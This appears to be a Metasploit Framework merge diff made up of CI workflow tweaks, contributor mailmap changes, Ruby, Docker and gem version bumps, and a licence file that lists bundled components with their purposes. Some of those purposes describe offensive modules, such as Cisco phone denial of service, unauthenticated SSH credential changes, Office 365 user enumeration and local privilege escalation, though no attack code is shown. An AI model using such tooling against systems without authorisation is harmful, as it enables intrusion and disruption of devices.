automatic module_metadata_base.json update

Land #17337 , Gather Dbeaver Password
Land #17395 , Adds docs for RPC workflows to docs site
2023-01-12 09:36:26 -06:00 · 2023-01-12 16:06:00 +01:00 · 2023-01-12 12:50:55 +00:00 · 2023-01-12 11:21:41 +00:00 · 2023-01-12 07:38:09 +08:00 · 2023-01-11 20:00:09 +01:00
133 changed files with 49197 additions and 1627 deletions
@@ -64,18 +64,18 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - 2.7
-          - 3.0
-          - 3.1
+          - '2.7'
+          - '3.0'
+          - '3.1'
        os:
          - ubuntu-20.04
          - ubuntu-latest
        exclude:
-          - { os: ubuntu-latest, ruby: 2.7 }
-          - { os: ubuntu-latest, ruby: 3.0 }
+          - { os: ubuntu-latest, ruby: '2.7' }
+          - { os: ubuntu-latest, ruby: '3.0' }
        include:
          - os: ubuntu-latest
-            ruby: 3.1
+            ruby: '3.1'
            test_cmd: 'bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" DATASTORE_FALLBACKS=1'
        test_cmd:
          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"
@@ -100,7 +100,7 @@ jobs:
          BUNDLE_WITHOUT: "coverage development pcap"
        uses: ruby/setup-ruby@v1
        with:
-          ruby-version: ${{ matrix.ruby }}
+          ruby-version: '${{ matrix.ruby }}'
          bundler-cache: true

      - name: Create database
@@ -1,45 +1,20 @@
-acammack-r7 <acammack-r7@github>       <acammack@aus-mbp-1099.aus.rapid7.com>
-acammack-r7 <acammack-r7@github>       <adam_cammack@rapid7.com>
-acammack-r7 <acammack-r7@github>       <Adam_Cammack@rapid7.com>
-adamgalway-r7 <adamgalway-r7@github>   <adam_galway@rapid7.com>
 adfoster-r7 <adfoster-r7@github>       <alandavid_foster@rapid7.com>
-bcook-r7 <bcook-r7@github>             <bcook@rapid7.com>
-bcook-r7 <bcook-r7@github>             <busterb@gmail.com>
-bturner-r7 <bturner-r7@github>         <brandon_turner@rapid7.com>
 bwatters-r7 <bwatters-r7@github>       <bwatters@rapid7.com>
 cdelafuente-r7 <cdelafuente-r7@github> Christophe De La Fuente <christophe_delafuente@rapid7.com>
 cdoughty-r7 <cdoughty-r7@github>       <chris_doughty@rapid7.com>
 cgranleese-r7 <cgranleese-r7@github>   <christopher_granleese@rapid7.com>
 dheiland-r7 <dheiland-r7@github>       <dh@layereddefense.com>
 dwelch-r7 <dwelch-r7@github>           <dean_welch@rapid7.com>
-ecarey-r7 <ecarey-r7@github>           <e@ipwnstuff.com>
 gwillcox-r7 <gwillcox-r7@github>       <Grant_Willcox@rapid7.com>
-jbarnett-r7 <jbarnett-r7@github>       <James_Barnett@rapid7.com>
-jbarnett-r7 <jbarnett-r7@github>       <jbarnett@rapid7.com>
-jinq102030 <jinq102030@github>         <Jin_Qian@rapid7.com>
-jinq102030 <jinq102030@github>         <jqian@rapid7.com>
 jmartin-r7 <jmartin-r7@github>         <Jeffrey_Martin@rapid7.com>
-lsato-r7 <lsato-r7@github>             <lsato@rapid7.com>
-lvarela-r7 <lvarela-r7@github>         <“leonardo_varela@rapid7.com”>
 mkienow-r7 <mkienow-r7@github>         <matthew_kienow@rapid7.com>
-pbarry-r7 <pbarry-r7@github>           <pearce_barry@rapid7.com>
 pdeardorff-r7 <pdeardorff-r7@github>   <paul_deardorff@rapid7.com>
 pdeardorff-r7 <pdeardorff-r7@github>   <Paul_Deardorff@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>     <sgonzalez@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>     <sonny_gonzalez@rapid7.com>
-shuckins-r7 <shuckins-r7@github>       <samuel_huckins@rapid7.com>
-sjanusz-r7 <sjanusz-r7@github>         <simon_janusz@rapid7.com>
 smcintyre-r7 <smcintyre-r7@github>     <spencer_mcintyre@rapid7.com>
 space-r7 <space-r7@github>             <shelby_pace@rapid7.com>
-tdoan-r7 <tdoan-r7@github>             <thao_doan@rapid7.com>
 todb-r7 <todb-r7@github>               <tod_beardsley@rapid7.com>
 todb-r7 <todb-r7@github>               <todb@metasploit.com>
 todb-r7 <todb-r7@github>               <todb@packetfu.com>
-wchen-r7 <wchen-r7@github>             <msfsinn3r@gmail.com> # aka sinn3r
-wchen-r7 <wchen-r7@github>             <wei_chen@rapid7.com>
-wvu-r7 <wvu-r7@github>                 <William_Vu@rapid7.com>
-wvu-r7 <wvu-r7@github>                 <wvu@nmt.edu>
-wwalker-r7 <wwalker-r7@github>         <wyatt_walker@rapid7.com>

 # Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at
@@ -48,9 +23,15 @@ wwalker-r7 <wwalker-r7@github>         <wyatt_walker@rapid7.com>
 # periodically. If you're on this list and would like to not be, just
 # let todb@metasploit.com know.

+acammack-r7 <acammack-r7@github>       <acammack@aus-mbp-1099.aus.rapid7.com>
+acammack-r7 <acammack-r7@github>       <adam_cammack@rapid7.com>
+acammack-r7 <acammack-r7@github>       <Adam_Cammack@rapid7.com>
+adamgalway-r7 <adamgalway-r7@github>   <adam_galway@rapid7.com>
 asoto-r7 <asoto-r7@github>             <aaron_soto@rapid7.com>
 bannedit <bannedit@github>             David Rude <bannedit0@gmail.com>
 bcoles <bcoles@github>                 bcoles <bcoles@gmail.com>
+bcook-r7 <bcook-r7@github>             <bcook@rapid7.com>
+bcook-r7 <bcook-r7@github>             <busterb@gmail.com>
 bokojan <bokojan@github>               parzamendi-r7 <peter_arzamendi@rapid7.com>
 bpatterson-r7 <bpatterson-r7@github>   <bpatterson@rapid7.com>
 bpatterson-r7 <bpatterson-r7@github>   <Brian_Patterson@rapid7.com>
@@ -58,6 +39,7 @@ brandonprry <brandonprry@github>       <bperry@brandons-mbp.attlocal.net>
 brandonprry <brandonprry@github>       Brandon Perry <bperry@bperry-rapid7.(none)>
 brandonprry <brandonprry@github>       Brandon Perry <bperry.volatile@gmail.com>
 brandonprry <brandonprry@github>       Brandon Perry <brandon.perry@zenimaxonline.com>
+bturner-r7 <bturner-r7@github>         <brandon_turner@rapid7.com>
 bwall <bwall@github>                   Brian Wallace <bwall@openbwall.com>
 bwall <bwall@github>                   (B)rian (Wall)ace <nightstrike9809@gmail.com>
 ceballosm <ceballosm@github>           Mario Ceballos <mc@metasploit.com>
@@ -75,6 +57,7 @@ DanielRTeixeira <DanielRTeixeira@github> Daniel Teixeira <danieljcrteixeira@gmai
 dmaloney-r7 <dmaloney-r7@github>       <David_Maloney@rapid7.com>
 dmaloney-r7 <dmaloney-r7@github>       <DMaloney@rapid7.com>
 dmohanty-r7 <dmohanty-r7@github>       <Dev_Mohanty@rapid7.com>
+ecarey-r7 <ecarey-r7@github>           <e@ipwnstuff.com>
 efraintorres <efraintorres@github>     efraintorres <etlownoise@gmail.com>
 efraintorres <efraintorres@github>     et <>
 egypt <egypt@github>                   <egypt@metasploit.com> # aka egypt
@@ -97,6 +80,8 @@ hdm <hdm@github>                       HD Moore <hdm@digitaloffense.net>
 hdm <hdm@github>                       HD Moore <hd_moore@rapid7.com>
 hdm <hdm@github>                       HD Moore <x@hdm.io>
 jabra <jabra@github>                   <jabra@spl0it.org>
+jbarnett-r7 <jbarnett-r7@github>       <James_Barnett@rapid7.com>
+jbarnett-r7 <jbarnett-r7@github>       <jbarnett@rapid7.com>
 jcran <jcran@github>                   <jcran@0x0e.org>
 jcran <jcran@github>                   <jcran@pentestify.com>
 jcran <jcran@github>                   <jcran@pwnieexpress.com>
@@ -105,6 +90,8 @@ jduck <jduck@github>                   <github.jdrake@qoop.org>
 jduck <jduck@github>                   <jdrake@qoop.org>
 jgor <jgor@github>                     jgor <jgor@indiecom.org>
 jhart-r7 <jhart-r7@github>             <jon_hart@rapid7.com>
+jinq102030 <jinq102030@github>         <Jin_Qian@rapid7.com>
+jinq102030 <jinq102030@github>         <jqian@rapid7.com>
 joevennix <joevennix@github>           Joe Vennix <joevennix@gmail.com>
 joevennix <joevennix@github>           <Joe_Vennix@rapid7.com>
 joevennix <joevennix@github>           <joev@metasploit.com>
@@ -123,6 +110,8 @@ lsanchez-r7 <lsanchez-r7@github>       <lance@AUS-MAC-1041.local>
 lsanchez-r7 <lsanchez-r7@github>       <lance.sanchez+github@gmail.com>
 lsanchez-r7 <lsanchez-r7@github>       <lance.sanchez@gmail.com>
 lsanchez-r7 <lsanchez-r7@github>       <lance.sanchez@rapid7.com>
+lsato-r7 <lsato-r7@github>             <lsato@rapid7.com>
+lvarela-r7 <lvarela-r7@github>         <“leonardo_varela@rapid7.com”>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <github@s3cur1ty.de>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <m1k3@s3cur1ty.de>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <michael.messner@integralis.com>
@@ -137,6 +126,7 @@ nullbind <nullbind@github>             nullbind <scott.sutherland@nullbind.com>
 nullbind <nullbind@github>             Scott Sutherland <scott.sutherland@nullbind.com>
 ohdae <ohdae@github>                   ohdae <bindshell@live.com>
 oj <oj@github>                         <oj@buffered.io>
+pbarry-r7 <pbarry-r7@github>           <pearce_barry@rapid7.com>
 r3dy <r3dy@github>                     Royce Davis <r3dy@Royces-MacBook-Pro.local>
 r3dy <r3dy@github>                     Royce Davis <rdavis@Royces-MacBook-Pro-2.local>
 r3dy <r3dy@github>                     Royce Davis <royce.e.davis@gmail.com>
@@ -155,6 +145,10 @@ scriptjunkie <scriptjunkie@github>     scriptjunkie <scriptjunkie@scriptjunkie.u
 sdavis-r7 <sdavis-r7@github>           <scott_davis@rapid7.com>
 sdavis-r7 <sdavis-r7@github>           <Scott_Davis@rapid7.com>
 sdavis-r7 <sdavis-r7@github>           <sdavis@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github>     <sgonzalez@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github>     <sonny_gonzalez@rapid7.com>
+shuckins-r7 <shuckins-r7@github>       <samuel_huckins@rapid7.com>
+sjanusz-r7 <sjanusz-r7@github>         <simon_janusz@rapid7.com>
 skape <skape@???>                      Matt Miller <mmiller@hick.org>
 smashery <smashery@github>             Ashley Donaldson <smashery@gmail.com>
 spoonm <spoonm@github>                 Spoon M <spoonm@gmail.com>
@@ -163,6 +157,7 @@ stufus <stufus@github>                 Stuart <stufus@users.noreply.github.com>
 swtornio <swtornio@github>             Steve Tornio <swtornio@gmail.com>
 Tasos Laskos <Tasos_Laskos@rapid7.com> Tasos Laskos <Tasos_Laskos@rapid7.com>
 tatanus <tatanus@github>               <adam_compton@rapid7.com>
+tdoan-r7 <tdoan-r7@github>             <thao_doan@rapid7.com>
 techpeace <techpeace@github>           Matt Buck <Matthew_Buck@rapid7.com>
 techpeace <techpeace@github>           Matt Buck <techpeace@gmail.com>
 timwr <timwr@github>                   <timrlw@gmail.com>
@@ -170,12 +165,15 @@ TomSellers <TomSellers@github>         Tom Sellers <tom@fadedcode.net>
 trevrosen <trevrosen@github>           Trevor Rosen <trevor@catapult-creative.com>
 trevrosen <trevrosen@github>           Trevor Rosen <Trevor_Rosen@rapid7.com>
 TrustedSec <davek@trustedsec.com>      trustedsec <davek@trustedsec.com>
-wwebb-r7 <wwebb-r7@github>             <William_Webb@rapid7.com>
 void-in <void-in@github>               void_in <root@localhost.localdomain>
 void-in <void-in@github>               void-in <root@localhost.localdomain>
 void-in <void-in@github>               <void-in@users.noreply.github.com>
 void-in <void-in@github>               void-in <waqas.bsquare@gmail.com>
 void-in <void-in@github>               Waqas Ali <waqas.bsquare@gmail.com>
+wchen-r7 <wchen-r7@github>             <msfsinn3r@gmail.com> # aka sinn3r
+wchen-r7 <wchen-r7@github>             <wei_chen@rapid7.com>
+wwalker-r7 <wwalker-r7@github>         <wyatt_walker@rapid7.com>
+wwebb-r7 <wwebb-r7@github>             <William_Webb@rapid7.com>
 zeroSteiner <zeroSteiner@github>       Spencer McIntyre <zeroSteiner@gmail.com>

 # Aliases for utility author names. Since they're fake, typos abound
@@ -185,4 +183,4 @@ Jenkins Bot <jenkins@rapid7.com>          Jenkins <jenkins@rapid7.com>
 Tab Assassin <tabassassin@metasploit.com> TabAssassin <tabasssassin@metasploit.com>
 Tab Assassin <tabassassin@metasploit.com> Tabassassin <tabassassin@metasploit.com>
 Tab Assassin <tabassassin@metasploit.com> Tabasssassin <tabassassin@metasploit.com>
-Tab Assassin <tabassassin@metasploit.com> URI Assassin <tabassassin@metasploit.com>
+Tab Assassin <tabassassin@metasploit.com> URI Assassin <tabassassin@metasploit.com>
@@ -1 +1 @@
-3.0.2
+3.0.5
@@ -1,4 +1,4 @@
-FROM ruby:3.0.4-alpine3.15 AS builder
+FROM ruby:3.0.5-alpine3.15 AS builder
 LABEL maintainer="Rapid7"

 ARG BUNDLER_CONFIG_ARGS="set clean 'true' set no-cache 'true' set system 'true' set without 'development test coverage'"
@@ -49,7 +49,7 @@ RUN mkdir -p $TOOLS_HOME/bin && \
    cd go/src && \
    ./make.bash

-FROM ruby:3.0.4-alpine3.15
+FROM ruby:3.0.5-alpine3.15
 LABEL maintainer="Rapid7"

 ENV APP_HOME=/usr/src/metasploit-framework
@@ -15,8 +15,7 @@ group :development do
  # generating documentation
  gem 'yard'
  # for development and testing purposes
-  # lock to version with 2.6 support until project updates
-  gem 'pry-byebug', '~> 3.9.0'
+  gem 'pry-byebug'
  # Ruby Debugging Library - rebuilt and included by default from Ruby 3.1 onwards.
  # Replaces the old lib/debug.rb and provides more features.
  gem 'debug', '>= 1.0.0'
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.2.30)
+    metasploit-framework (6.2.35)
      actionpack (~> 6.0)
      activerecord (~> 6.0)
      activesupport (~> 6.0)
@@ -11,7 +11,6 @@ PATH
      bcrypt
      bcrypt_pbkdf
      bson
-      concurrent-ruby (= 1.0.5)
      dnsruby
      ed25519
      em-http-request
@@ -30,7 +29,7 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.101)
+      metasploit-payloads (= 2.0.105)
      metasploit_data_models
      metasploit_payloads-mettle (= 1.0.20)
      mqtt
@@ -128,19 +127,19 @@ GEM
      activerecord (>= 3.1.0, < 8)
    ast (2.4.2)
    aws-eventstream (1.2.0)
-    aws-partitions (1.671.0)
-    aws-sdk-core (3.168.3)
+    aws-partitions (1.689.0)
+    aws-sdk-core (3.168.4)
      aws-eventstream (~> 1, >= 1.0.2)
      aws-partitions (~> 1, >= 1.651.0)
      aws-sigv4 (~> 1.5)
      jmespath (~> 1, >= 1.6.1)
-    aws-sdk-ec2 (1.354.0)
+    aws-sdk-ec2 (1.356.0)
      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
    aws-sdk-iam (1.73.0)
      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.60.0)
+    aws-sdk-kms (1.61.0)
      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
    aws-sdk-s3 (1.117.2)
@@ -156,11 +155,11 @@ GEM
    builder (3.2.4)
    byebug (11.1.3)
    coderay (1.1.3)
-    concurrent-ruby (1.0.5)
+    concurrent-ruby (1.1.10)
    cookiejar (0.3.3)
    crass (1.0.6)
    daemons (1.4.1)
-    debug (1.7.0)
+    debug (1.7.1)
      irb (>= 1.5.0)
      reline (>= 0.3.1)
    diff-lcs (1.5.0)
@@ -178,16 +177,16 @@ GEM
      http_parser.rb (>= 0.6.0)
    em-socksify (0.3.2)
      eventmachine (>= 1.0.0.beta.4)
-    erubi (1.11.0)
+    erubi (1.12.0)
    eventmachine (1.2.7)
    factory_bot (6.2.1)
      activesupport (>= 5.0.0)
    factory_bot_rails (6.2.0)
      factory_bot (~> 6.2.0)
      railties (>= 5.0.0)
-    faker (3.0.0)
+    faker (3.1.0)
      i18n (>= 1.8.11, < 2)
-    faraday (2.7.1)
+    faraday (2.7.2)
      faraday-net_http (>= 2.0, < 3.1)
      ruby2_keywords (>= 0.0.4)
    faraday-net_http (3.0.2)
@@ -215,8 +214,8 @@ GEM
    httpclient (2.8.3)
    i18n (1.12.0)
      concurrent-ruby (~> 1.0)
-    io-console (0.5.11)
-    irb (1.5.1)
+    io-console (0.6.0)
+    irb (1.6.2)
      reline (>= 0.3.0)
    jmespath (1.6.2)
    jsobfu (0.4.2)
@@ -226,7 +225,7 @@ GEM
    logging (2.3.1)
      little-plugger (~> 1.1)
      multi_json (~> 1.14)
-    loofah (2.19.0)
+    loofah (2.19.1)
      crass (~> 1.0.2)
      nokogiri (>= 1.5.9)
    memory_profiler (1.0.1)
@@ -235,7 +234,7 @@ GEM
      activemodel (~> 6.0)
      activesupport (~> 6.0)
      railties (~> 6.0)
-    metasploit-credential (6.0.0)
+    metasploit-credential (6.0.1)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 5.0.0)
@@ -249,7 +248,7 @@ GEM
      activemodel (~> 6.0)
      activesupport (~> 6.0)
      railties (~> 6.0)
-    metasploit-payloads (2.0.101)
+    metasploit-payloads (2.0.105)
    metasploit_data_models (5.0.6)
      activerecord (~> 6.0)
      activesupport (~> 6.0)
@@ -262,8 +261,8 @@ GEM
      webrick
    metasploit_payloads-mettle (1.0.20)
    method_source (1.0.0)
-    mini_portile2 (2.8.0)
-    minitest (5.16.3)
+    mini_portile2 (2.8.1)
+    minitest (5.17.0)
    mqtt (0.5.0)
    msgpack (1.6.0)
    multi_json (1.15.0)
@@ -271,7 +270,7 @@ GEM
      ruby2_keywords (~> 0.0.1)
    nessus_rest (0.1.6)
    net-ldap (0.17.1)
-    net-protocol (0.2.0)
+    net-protocol (0.2.1)
      timeout
    net-smtp (0.3.3)
      net-protocol
@@ -279,7 +278,7 @@ GEM
    network_interface (0.0.2)
    nexpose (7.3.0)
    nio4r (2.5.8)
-    nokogiri (1.13.9)
+    nokogiri (1.13.10)
      mini_portile2 (~> 2.8.0)
      racc (~> 1.4)
    nori (2.6.0)
@@ -292,7 +291,7 @@ GEM
    packetfu (1.1.13)
      pcaprub
    parallel (1.22.1)
-    parser (3.1.3.0)
+    parser (3.2.0.0)
      ast (~> 2.4.1)
    patch_finder (1.0.2)
    pcaprub (0.13.1)
@@ -303,26 +302,26 @@ GEM
      ruby-rc4
      ttfunk
    pg (1.4.5)
-    pry (0.13.1)
+    pry (0.14.2)
      coderay (~> 1.1)
      method_source (~> 1.0)
-    pry-byebug (3.9.0)
+    pry-byebug (3.10.1)
      byebug (~> 11.0)
-      pry (~> 0.13.0)
-    public_suffix (5.0.0)
-    puma (6.0.0)
+      pry (>= 0.13, < 0.15)
+    public_suffix (5.0.1)
+    puma (6.0.2)
      nio4r (~> 2.0)
-    racc (1.6.1)
-    rack (2.2.4)
-    rack-protection (3.0.4)
+    racc (1.6.2)
+    rack (2.2.5)
+    rack-protection (3.0.5)
      rack
    rack-test (2.0.2)
      rack (>= 1.3)
    rails-dom-testing (2.0.3)
      activesupport (>= 4.2.0)
      nokogiri (>= 1.6)
-    rails-html-sanitizer (1.4.3)
-      loofah (~> 2.3)
+    rails-html-sanitizer (1.4.4)
+      loofah (~> 2.19, >= 2.19.1)
    railties (6.1.7)
      actionpack (= 6.1.7)
      activesupport (= 6.1.7)
@@ -336,7 +335,7 @@ GEM
      nokogiri
    redcarpet (3.5.1)
    regexp_parser (2.6.1)
-    reline (0.3.1)
+    reline (0.3.2)
      io-console (~> 0.5)
    rex-arch (0.1.14)
      rex-text
@@ -383,7 +382,7 @@ GEM
      rex-socket
      rex-text
    rex-struct2 (0.1.3)
-    rex-text (0.2.46)
+    rex-text (0.2.47)
    rex-zip (0.1.4)
      rex-text
    rexml (3.2.5)
@@ -394,10 +393,10 @@ GEM
      rspec-mocks (~> 3.12.0)
    rspec-core (3.12.0)
      rspec-support (~> 3.12.0)
-    rspec-expectations (3.12.0)
+    rspec-expectations (3.12.2)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.12.0)
-    rspec-mocks (3.12.0)
+    rspec-mocks (3.12.2)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.12.0)
    rspec-rails (6.0.1)
@@ -411,17 +410,17 @@ GEM
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
    rspec-support (3.12.0)
-    rubocop (1.39.0)
+    rubocop (1.42.0)
      json (~> 2.3)
      parallel (~> 1.10)
      parser (>= 3.1.2.1)
      rainbow (>= 2.2.2, < 4.0)
      regexp_parser (>= 1.8, < 3.0)
      rexml (>= 3.2.5, < 4.0)
-      rubocop-ast (>= 1.23.0, < 2.0)
+      rubocop-ast (>= 1.24.1, < 2.0)
      ruby-progressbar (~> 1.7)
      unicode-display_width (>= 1.4.0, < 3.0)
-    rubocop-ast (1.24.0)
+    rubocop-ast (1.24.1)
      parser (>= 3.1.1.0)
    ruby-macho (3.0.0)
    ruby-prof (1.4.2)
@@ -445,10 +444,10 @@ GEM
    simplecov-html (0.12.3)
    simpleidn (0.2.1)
      unf (~> 0.1.4)
-    sinatra (3.0.4)
+    sinatra (3.0.5)
      mustermann (~> 3.0)
      rack (~> 2.2, >= 2.2.4)
-      rack-protection (= 3.0.4)
+      rack-protection (= 3.0.5)
      tilt (~> 2.0)
    sqlite3 (1.5.4)
      mini_portile2 (~> 2.8.0)
@@ -470,7 +469,7 @@ GEM
    unf (0.1.4)
      unf_ext
    unf_ext (0.0.8.2)
-    unicode-display_width (2.3.0)
+    unicode-display_width (2.4.2)
    unix-crypt (1.3.0)
    warden (1.2.9)
      rack (>= 2.0.9)
@@ -508,7 +507,7 @@ DEPENDENCIES
  memory_profiler
  metasploit-framework!
  octokit
-  pry-byebug (~> 3.9.0)
+  pry-byebug
  rake
  redcarpet
  rspec-rails
@@ -15,54 +15,101 @@ License: BSD-3-clause
 # Last updated: 2013-Nov-04
 #

-Files: data/headers/windows/c_payload_util/beacon.h
-Copyright: 2022, Copyright Help/Systems LLC and its group of companies.
-License: Apache 2.0
-
 Files: data/exploits/mysql/lib_mysqludf_sys_*.so
 Copyright: 2007  Roland Bouman
           2008-2010  Roland Bouman and Bernardo Damele A. G.
 License: LGPL-2.1
+Purpose: These files are used in exploits/multi/mysql/mysql_udf_payload.rb
+
+Files: data/headers/windows/c_payload_util/beacon.h
+Copyright: 2022, Copyright Help/Systems LLC and its group of companies.
+License: Apache 2.0
+
+Files: data/jtr/*
+Copyright: Copyright 1996-2013 by Solar Designer
+License: GNU GPL 2.0
+
+Files: data/post/SharpHound.exe
+       data/post/powershell/SharpHound.ps1
+Copyright (C) 2016-2022 Specter Ops Inc.
+License: GNU GPL 3.0
+Purpose: These files are uploaded and executed by
+         post/windows/gather/bloodhound.

 Files: data/templates/to_mem_pshreflection.ps1.template
 Copyright: 2012, Matthew Graeber
 License: BSD-3-clause

-Files: external/source/exploits/IE11SandboxEscapes/*
-Copyright: James Forshaw, 2014
-License: GPLv3
+Files: data/webcam/api.js
+Copyright: Copyright 2013 Muaz Khan<@muazkh>.
+License: MIT

 Files: external/source/byakugan/*
 Copyright: Lurene Grenier, 2009
 License: BSD-3-clause

+Files: external/source/evasion/windows/process_herpaderping/ProcessHerpaderping/*
+Copyright: 2020 Johnny Shaw
+License: MIT
+
+Files: external/source/exploits/CVE-2018-8120/*
+Copyright: 2018
+License: GNU GPL 3
+Purpose: This supports exploits/windows/local/ms18_8120_win32k_privesc module
+
+Files: exteneral/source/exploits/CVE-2022-26904/*
+Copyright: 2022 Abdelhamid Naceri
+License: MIT
+
+Files: external/source/exploits/drunkpotato/Common_Src_Files/spnegotokenhandler/*
+Copyright: 2011 Jon Bringhurst
+License: GNU GPL 2.0
+
+Files: external/source/exploits/IE11SandboxEscapes/*
+Copyright: James Forshaw, 2014
+License: GPLv3
+Purpose: This set of source code supports the following modules
+         exploits/windows/local/ms13_097_ie_registry_symlink.rb
+         exploits/windows/local/ms14_009_ie_dfsvc.rb
+
 Files: external/source/ipwn/*
 Copyright: 2004-2005 vlad902 <vlad902 [at] gmail.com>
           2007 H D Moore <hdm [at] metasploit.com>
 License: GPL-2 and Artistic
-
-Files: external/source/ReflectiveDLLInjection/*
-Copyright: 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-License: BSD-3-clause
+Purpose: These files are used in payloads/stages/osx/armle/execute

 Files: external/source/metsvc/*
 Copyright: 2007, Determina Inc.
 License: BSD-3-clause

-Files: external/source/tightvnc/*
-Copyright: 1999 AT&T Laboratories Cambridge.
-           2000 Tridia Corp.
-           2002-2003 RealVNC Ltd.
-           2001-2004 HorizonLive.com, Inc.
-           2000-2007 Constantin Kaplinsky
-           2000-2009 TightVNC Group
-License: GPL-2
+Files: external/source/osx/isight/*
+Copyright: 2009
+License: GPL
+Purpose: Used in modules/payloads/stages/osx/x86/isight to capture images.
+
+Files: external/source/pxesploit/regeditor/ntreg.h
+       external/source/pxesploit/regeditor/ntreg.c
+Copyright: 1997-2010, Petter Nordahl-Hagen
+License: LGPL
+Purpose: Unknown. These files are used to create a linux binary called regeditor
+         which allows a linux OS to edit a Windows registry. It is used in
+         pxesploit modules.
+
+Files: external/source/ReflectiveDLLInjection/*
+Copyright: 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+License: BSD-3-clause
+
+Files: external/source/shellcode/windows/build.sh
+Copyright: 2009
+License: GPL / Perl Artistic
+Purpose: A perl script to build some of the x86 Windows payloads.

 Files: external/source/unixasm/*
 Copyright: 2004-2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
 License: BSD-4-clause

 Files: external/source/vncdll/winvnc/*
+       external/source/tightvnc/*
 Copyright: 1999 AT&T Laboratories Cambridge.
           2000 Tridia Corp.
           2002-2003 RealVNC Ltd.
@@ -70,8 +117,12 @@ Copyright: 1999 AT&T Laboratories Cambridge.
           2000-2006 Constantin Kaplinsky.
           2000-2009 TightVNC Group
 License: GPL-2
+Purpose: The built result is used in:
+           payloads/stages/windows/vncinject.rb
+           payloads/stages/windows/x64/vncinject.rb

-Files: lib/anemone.rb lib/anemone/*
+Files: lib/anemone.rb
+       lib/anemone/*
 Copyright: 2009 Vertive, Inc.
 License: MIT

@@ -83,11 +134,19 @@ Files: lib/msf/core/modules/external/python/async_timeout/*
 Copyright: 2016-2017 Andrew Svetlov
 License: Apache 2.0

-Files: lib/net/dns.rb lib/net/dns/*
+Files: lib/msf/core/web_services/public/*
+       lib/msf/core/web_services/views/api_docs.erb
+Copyright: Copyright 2018 SmartBear Software
+License: Apache 2.0
+
+Files: lib/net/dns.rb
+       lib/net/dns/*
 Copyright: 2006 Marco Ceresa
 License: Ruby

-Files: lib/postgres_msf.rb lib/postgres/postgres-pr/message.rb lib/postgres/postgres-pr/connection.rb
+Files: lib/postgres_msf.rb
+       lib/postgres/postgres-pr/message.rb
+       lib/postgres/postgres-pr/connection.rb
 Copyright: 2005 Michael Neumann
 License: BSD-3-clause or Ruby

@@ -95,11 +154,13 @@ Files: lib/rabal/*
 Copyright: Jeremy Hinegadner <jeremy at hinegardner dot org>
 License: Ruby

-Files: lib/rbmysql.rb lib/rbmysql/*
+Files: lib/rbmysql.rb
+       lib/rbmysql/*
 Copyright: 2009 tommy
 License: Ruby

-Files: lib/snmp.rb lib/snmp/*
+Files: lib/snmp.rb
+       lib/snmp/*
 Copyright: 2004, David R. Halliday
 License: Ruby

@@ -107,37 +168,81 @@ Files: lib/windows_console_color_support.rb
 Copyright: 2011 Michael 'mihi' Schierl
 License: BSD-3-clause

-Files: lib/zip.rb lib/zip/*
+Files: lib/zip.rb
+       lib/zip/*
 Copyright: 2002-2004, Thomas Sandergaard
 License: Ruby

+Files: modules/auxiliary/dos/cisco/cisco_7937g_dos.py
+Copyright: 2020, Cody Martin
+License: GPL
+Purpose: This module allows an attacker to render a Cisco 7937G unresponsive
+         until it is manually power cycled.
+
+Files: modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.py
+Copyright: 2020, Cody Martin
+License: GPL
+Purpose: This module allows an attacker to render a Cisco 7937G unresponsive
+         until it automatically power cycles.
+
+Files: modules/auxiliary/admin/http/cisco_7937g_ssh_privesc.py
+Copyright: 2020, Cody Martin
+License: GPL
+Purpose: This module allows an unauthenticated user to change the credentials
+         for SSH access on a Cisco 7937G device.
+
+Files: modules/auxiliary/gather/office365userenum.py
+Copyright: 2015  Oliver Morton
+License: GPL
+Purpose: Enumerates valid usernames from Office 365 using ActiveSync.
+
+Files: modules/exploits/linux/local/bpf_priv_esc.rb
+       data/exploits/CVE-2016-4557/hello
+Copyright: 2001-2007
+License: GPL
+Purpose: This module contains the source code for FUSE, which this module
+         uploads and compiles or uploads a precompiled binary (hello).
+
+Files: modules/exploits/linux/local/ntfs3g_priv_esc.rb
+Copyright: 2017
+License: GPLv2
+Purpose: The Ruby file contains the text of several modules from exploit-db 
+         which it compiles and uploads to the target to elevate privileges.
+
+Files: modules/exploits/unix/fileformat/metasploit_libnotify_cmd_injection.rb
+Copyright: 2020
+License: GPL
+Purpose: This module targets a vulnerability in Metasploit Framework versions
+         prior to 5.0.86.
+
+Files: modules/exploits/windows/smb/ms04_007_killbill.rb
+Copyright: 2004, Solar Eclipse
+License: GPL
+Purpose: The module exploits the Windows ASN.1 vulnerability in Windows 2000 
+         SP2-SP4 and Windows XP SP0-SP1. It contains code ported from a GPLv2
+         module.
+
 Files: modules/payloads/singles/windows/speak_pwned.rb
 Copyright: 2009-2010 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
 License: BSD-3-clause

-Files: data/webcam/api.js
-Copyright: Copyright 2013 Muaz Khan<@muazkh>.
-License: MIT
+Files: modules/payloads/singles/windows/x64/messagebox.rb
+Copyright: 2018, jaguinaga
+License: GPL
